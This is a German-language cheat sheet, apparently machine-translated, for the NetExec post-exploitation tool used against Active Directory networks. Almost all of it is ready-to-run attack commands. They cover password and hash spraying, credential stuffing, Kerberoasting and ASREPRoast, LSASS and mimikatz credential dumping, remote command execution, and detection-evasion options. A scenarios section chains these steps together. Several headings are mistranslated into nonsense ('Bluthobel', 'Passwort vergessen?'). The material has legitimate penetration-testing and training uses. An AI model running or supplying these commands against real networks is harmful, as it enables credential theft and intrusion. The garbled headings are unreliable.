Zum Inhalt

NetExec

generieren

NetExec (früher CrackMapExec) ist ein Post-Exploitation-Tool, das hilft, die Sicherheit von großen Active Directory-Netzwerken durch Netzwerkprotokoll Missbrauch und Anmeldeangriffe zu automatisieren.

Installation und Inbetriebnahme

| | Command | Description | | | --- | --- | | | pip3 install netexec | Install NetExec via pip | | | | pipx install netexec | Install with pipx (recommended) | | | | git clone https://github.com/Pennyw0rth/NetExec.git | Clone from GitHub | | | | cd NetExec && pip3 install . | Install from source | | | | netexec --version | Check installed version | | | | netexec --help | Display help information | |

Basisnutzung

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.0/24 | Scan SMB on subnet | | | | netexec smb 192.168.1.100 -u username -p password | Authenticate with credentials | | | | netexec smb 192.168.1.100 -u username -H ntlmhash | Authenticate with NTLM hash | | | | netexec smb 192.168.1.100 -u '' -p '' | Anonymous authentication | | | | netexec smb targets.txt -u username -p password | Use target file | |

Unterstützung des Protokolls

SMB-Protokoll

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 | Basic SMB enumeration | | | | netexec smb 192.168.1.100 --shares | Enumerate shares | | | | netexec smb 192.168.1.100 --users | Enumerate users | | | | netexec smb 192.168.1.100 --groups | Enumerate groups | | | | netexec smb 192.168.1.100 --local-groups | Enumerate local groups | | | | netexec smb 192.168.1.100 --sessions | Enumerate sessions | | | | netexec smb 192.168.1.100 --disks | Enumerate disks | |

WinRM Protokoll

| | Command | Description | | | --- | --- | | | netexec winrm 192.168.1.100 -u username -p password | WinRM authentication | | | | netexec winrm 192.168.1.100 -u username -p password -x "whoami" | Execute command | | | | netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 | Execute PowerShell script | |

LDAP-Protokoll

| | Command | Description | | | --- | --- | | | netexec ldap 192.168.1.100 -u username -p password | LDAP authentication | | | | netexec ldap 192.168.1.100 -u username -p password --users | Enumerate LDAP users | | | | netexec ldap 192.168.1.100 -u username -p password --groups | Enumerate LDAP groups | | | | netexec ldap 192.168.1.100 -u username -p password --computers | Enumerate computers | |

MSSQL Protokoll

| | Command | Description | | | --- | --- | | | netexec mssql 192.168.1.100 -u username -p password | MSSQL authentication | | | | netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" | Execute SQL query | | | | netexec mssql 192.168.1.100 -u username -p password --local-auth | Local authentication | |

SSH-Protokoll

| | Command | Description | | | --- | --- | | | netexec ssh 192.168.1.100 -u username -p password | SSH authentication | | | | netexec ssh 192.168.1.100 -u username -k id_rsa | SSH key authentication | | | | netexec ssh 192.168.1.100 -u username -p password -x "id" | Execute command | |

Authentifizierungsmethoden

Passwort Authentication

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -u username -p password | Single credential | | | | netexec smb 192.168.1.100 -u users.txt -p passwords.txt | Credential lists | | | | netexec smb 192.168.1.100 -u username -p passwords.txt | Password spraying | | | | netexec smb 192.168.1.100 -u users.txt -p password | User enumeration | |

Hash Authentication

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -u username -H ntlmhash | NTLM hash | | | | netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash | LM:NTLM hash | | | | netexec smb 192.168.1.100 -u users.txt -H hashes.txt | Hash lists | |

Kerberos Authentication

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -u username -p password -k | Kerberos authentication | | | | netexec smb 192.168.1.100 -u username --use-kcache | Use Kerberos cache | | | | netexec smb 192.168.1.100 -u username -p password --kerberos | Force Kerberos | |

Aufzählung

Aktienzählung

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --shares | List shares | | | | netexec smb 192.168.1.100 --shares -u username -p password | Authenticated share listing | | | | netexec smb 192.168.1.100 --spider SHARE | Spider share contents | | | | netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" | Search for files | |

Benutzeraufzählung

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --users | Enumerate users | | | | netexec smb 192.168.1.100 --rid-brute | RID bruteforce | | | | netexec smb 192.168.1.100 --users --rid-brute 1000-2000 | RID range | |

Gruppenaufzählung

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --groups | Enumerate groups | | | | netexec smb 192.168.1.100 --local-groups | Local groups | | | | netexec smb 192.168.1.100 --groups "Domain Admins" | Specific group | |

Computeraufzählung

| | Command | Description | | | --- | --- | | | netexec ldap 192.168.1.100 --computers | Enumerate computers | | | | netexec smb 192.168.1.100 --computers | SMB computer enumeration | |

Ausführung des Befehls

SMB Command Execution

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -u username -p password -x "whoami" | Execute command | | | | netexec smb 192.168.1.100 -u username -p password -X script.ps1 | Execute PowerShell script | | | | netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec | Use WMI execution | | | | netexec smb 192.168.1.100 -u username -p password --exec-method smbexec | Use SMB execution | |

WinRM Command Execution

| | Command | Description | | | --- | --- | | | netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" | PowerShell command | | | | netexec winrm 192.168.1.100 -u username -p password -X script.ps1 | Execute script | |

Module

Eingebaute Module

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -M spider_plus | Enhanced spidering | | | | netexec smb 192.168.1.100 -M enum_avproducts | Enumerate AV products | | | | netexec smb 192.168.1.100 -M gpp_password | Group Policy Preferences | | | | netexec smb 192.168.1.100 -M lsassy | LSASS dumping | | | | netexec smb 192.168.1.100 -M mimikatz | Mimikatz execution | |

Moduloptionen

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false | Module options | | | | netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true | Bloodhound output | |

Datenbanken

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --users --export users.csv | Export to CSV | | | | netexec db | Database management | | | | netexec db --workspace default | Set workspace | | | | netexec db --clear-database | Clear database | |

Erweiterte Funktionen

Credential Stuffing

| | Command | Description | | | --- | --- | | | netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success | Continue on success | | | | netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 | Fail limit | |

Passwort vergessen?

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --pass-pol | Get password policy | | | | netexec ldap 192.168.1.100 --pass-pol | LDAP password policy | |

Bluthobel Integration

| | Command | Description | | | --- | --- | | | netexec ldap 192.168.1.100 -u username -p password --bloodhound | Collect Bloodhound data | | | | netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All | All collections | |

ASREPRoast

| | Command | Description | | | --- | --- | | | netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt | ASREPRoast attack | | | | netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt | Authenticated ASREPRoast | |

Kerberoasen

| | Command | Description | | | --- | --- | | | netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt | Kerberoasting attack | |

Ausgabe und Logging

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --verbose | Verbose output | | | | netexec smb 192.168.1.100 --debug | Debug output | | | | netexec smb 192.168.1.100 -o output.txt | Save output to file | | | | netexec smb 192.168.1.100 --log logs/ | Log directory | |

Konfiguration

Config File (~/.nxc/nxc.conf)

ini [nxc] workspace = default last_used_db = ~/.nxc/workspaces/default/nxc.db pwn3d_label = Pwn3d! audit_mode = False reveal_chars_of_pwd = 0_

Protokollspezifische Optionen

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --port 445 | Custom port | | | | netexec smb 192.168.1.100 --timeout 5 | Connection timeout | | | | netexec smb 192.168.1.100 --threads 100 | Thread count | |

Evasion Techniken

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 --jitter 1-5 | Random delay | | | | netexec smb 192.168.1.100 --delay 2 | Fixed delay | | | | netexec smb 192.168.1.100 --obfs | Obfuscation | |

Gemeinsame Angriffsszenarien

Domain Enumeration

```bash

Basic domain enumeration

netexec smb dc.domain.com -u username -p password --users --groups --computers

Share enumeration

netexec smb 192.168.1.0/24 -u username -p password --shares

Password policy

netexec smb dc.domain.com -u username -p password --pass-pol ```_

Credential Attacks

```bash

Password spraying

netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

Hash spraying

netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

ASREPRoast

netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt ```_

Post-Exploitation

```bash

Command execution

netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

LSASS dumping

netexec smb 192.168.1.100 -u username -p password -M lsassy

Bloodhound collection

netexec ldap dc.domain.com -u username -p password --bloodhound -c All ```_

Integration mit anderen Tools

Impacket Integration

| | Command | Description | | | --- | --- | | | netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec | Use Impacket WMI | | | | netexec smb 192.168.1.100 -u username -p password --exec-method smbexec | Use Impacket SMB | |

Crackmapexemplar Migration

| | Command | Description | | | --- | --- | | | netexec --convert-cme-db | Convert CME database | | | | alias cme='netexec' | Create alias for compatibility | |

Fehlerbehebung

| | Command | Description | | | --- | --- | | | netexec --help | General help | | | | netexec smb --help | Protocol-specific help | | | | netexec -v | Version information | | | | netexec --debug smb 192.168.1.100 | Debug mode | |

Best Practices

  • Verwenden Sie die Authentifizierung vor der Aufzählung, wenn möglich
  • Durchführung richtiger Verzögerungen, um die Erkennung zu vermeiden
  • Verwenden Sie Workspaces, um verschiedene Engagements zu organisieren
  • Exportergebnisse für weitere Analysen
  • Kombinieren Sie mit anderen Instrumenten zur umfassenden Bewertung
  • Monitor für defensive Antworten
  • Verwenden Sie entsprechende Gewindezählungen, um überwältigende Ziele zu vermeiden
  • Durchführung der richtigen Protokollierung
  • Validierung von Anmeldeinformationen vor groß angelegten Angriffen
  • Benutzen Sie obfuscation Techniken, wenn nötig

Sicherheitsüberlegungen

  • Nur Nutzung in autorisierten Netzwerken
  • Implementierung richtiger Zugriffskontrollen
  • Monitor zum Nachweis von Sicherheitswerkzeugen
  • Wenigstens Privilegien verwenden
  • Dokumentation aller Tätigkeiten für die Einhaltung
  • Koordination mit blauem Team, wenn zutreffend
  • Durchführung richtiger Reinigungsverfahren
  • Anmeldeinformationen sicher speichern
  • Verschlüsselte Kommunikation verwenden, wenn möglich
  • Regelmäßige Updates zur Aufrechterhaltung der Wirksamkeit